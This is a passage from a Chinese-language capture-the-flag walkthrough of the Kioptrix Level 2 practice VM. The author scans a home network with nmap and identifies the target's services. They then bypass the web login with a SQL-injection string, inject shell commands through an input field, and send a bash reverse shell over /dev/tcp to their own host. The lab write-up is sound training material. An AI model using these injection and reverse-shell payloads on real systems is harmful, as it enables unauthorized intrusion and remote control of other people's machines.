一、简介
KIOPTRIX VM映像挑战: 这个Kioptrix VM映像很容易挑战。游戏的目的是通过任何可能的方式获得root用户访问权限(除了实际入侵VM服务器或播放器外)。这些游戏的目的是学习漏洞评估和利用中的基本工具和技术。成功完成挑战的方法不止一种。 资料来源:http : //www.kioptrix.com/blog/? page_id= 135 资料来源:http://www.kioptrix.com/blog/? p = 49 这是#2的第二个版本。首次发布的Web应用程序存在错误 2012年2月9日:重新发布 2011年2月11日:原始版本
二、环境搭建
访问 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/下载vm镜像
三、实战渗透
nmap扫描目标网段寻找主机
xiaoze@bad:~$ nmap 192.168.2.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 03:15 CST Nmap scan report for RM2100.lan (192.168.2.1) Host is up (0.0037s latency). Not shown: 996 closed ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http 1080/tcp open socks Nmap scan report for chuangmi-plug-v3_miap5EDA.lan (192.168.2.100) Host is up (0.014s latency). All 1000 scanned ports on chuangmi-plug-v3_miap5EDA.lan (192.168.2.100) are closed Nmap scan report for lumi-acpartner-mcn02_miap9740.lan (192.168.2.108) Host is up (0.0078s latency). All 1000 scanned ports on lumi-acpartner-mcn02_miap9740.lan (192.168.2.108) are closed Nmap scan report for MiAiSoundbox.lan (192.168.2.117) Host is up (0.0036s latency). Not shown: 998 closed ports PORT STATE SERVICE 53/tcp open domain 9999/tcp open abyss Nmap scan report for zedeMacBook-Pro.lan (192.168.2.120) Host is up (0.30s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/tcp open http Nmap scan report for bad.lan (192.168.2.133) Host is up (0.00027s latency). All 1000 scanned ports on bad.lan (192.168.2.133) are closed Nmap scan report for lumi-gateway-v3_miio87687718.lan (192.168.2.153) Host is up (0.0095s latency). All 1000 scanned ports on lumi-gateway-v3_miio87687718.lan (192.168.2.153) are closed Nmap scan report for 192.168.2.161 Host is up (0.0028s latency). Not shown: 994 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 443/tcp open https 631/tcp open ipp 3306/tcp open mysql Nmap scan report for MIX2S-ouyangxiaozede.lan (192.168.2.235) Host is up (0.0060s latency). All 1000 scanned ports on MIX2S-ouyangxiaozede.lan (192.168.2.235) are closed Nmap done: 256 IP addresses (9 hosts up) scanned in 18.32 seconds
确定目标主机为192.18.2.161
xiaoze@bad:~$ sudo nmap -sS -sV -O 192.168.2.161 [sudo] xiaoze 的密码: Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 03:20 CST Nmap scan report for 192.168.2.161 Host is up (0.00086s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) 80/tcp open http Apache httpd 2.0.52 ((CentOS)) 111/tcp open rpcbind 2 (RPC #100000) 443/tcp open ssl/https? 631/tcp open ipp CUPS 1.1 3306/tcp open mysql MySQL (unauthorized) MAC Address: 00:0C:29:E1:BD:4F (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.30 Network Distance: 1 hop OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.10 seconds
发现80端口开放web服务,作为一个web狗,遇到web才是解题思路,访问网站http://192.168.2.161,访问之后是这样的,
admin:admin弱口令登陆密码错误,万能密码admin' or 1=1 -- -登陆成功
输入框里面输入baidu.com;ls -la 发现可以执行ls -la命令。
使用nc反弹shell,
127.0.0.1; bash -i >& /dev/tcp/192.168.2.133/8877 0>&1